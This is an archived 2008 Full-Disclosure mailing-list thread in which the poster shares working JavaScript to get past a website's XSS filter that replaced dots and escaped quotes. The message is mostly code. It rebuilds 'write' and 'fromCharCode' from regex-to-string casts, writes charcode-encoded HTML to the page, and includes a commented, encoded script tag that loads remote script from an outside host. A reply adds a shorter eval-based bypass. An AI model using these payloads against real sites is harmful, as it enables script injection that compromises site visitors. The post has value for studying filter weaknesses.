lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
Message-ID: <dd5f5ac90806181227y1e76e6bdke82dd29f5a7969b5@mail.gmail.com>
Date: Wed, 18 Jun 2008 21:27:29 +0200
From: "Thomas Pollet" <thomas.pollet@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Re: xss dot(.) filter evasion

Hello,

so,

with (String) { eval(fromCharCode( /* insert charcodes here */ ) )}

is what i needed

Regards,
Thomas Pollet

2008/6/18 Thomas Pollet <thomas.pollet@...il.com>:
> Hello,
>
> I came across this site that implemented some filtering so the dots were
> replaced by an underscore, also the quotes and backslash were escaped.
> I came up with the code below to bypass this filtering (write anything to
> the page using String.fromCharCode)
> Someone knows a different way to do this?
>
> <html>
>  <head>
>    <title>
>    </title>
>  </head>
>  <body>
> <script>
> function write(str){
>    //document.write() doesn't work as it becomes document_write()
>    var s = /write/;
>    var w = String();
>    var n = String();
>    w += s;
>    //cast to string so we can index
>    w += s;
>    n += w[1] + w[2] + w[3] + w[4] + w[5];
>    //call document['write']
>    document[n](str);
> }
> var s = /fromCharCode/;
> var w = String();
> var n = String();
> w += s;
> n += w[1] + w[2] + w[3] + w[4] + w[5] + w[6] + w[7] + w[8] + w[9] + w[10] +
> w[11] + w[12];
>
> write(String[n](60,97,32,104,114,101,102,61,34,104,116,116,112,58,47,47,119,104,97,116,101,118,101,114,46,99,111,109,34,47,
> 62,104,60,47,97,62));
>
> /*
> write(String[n](60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,104,46,99
> ,111,109,34,62));
> */
>
> </script>
>  </body>
> </html>
>
> Regards,
> Thoms Pollet
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists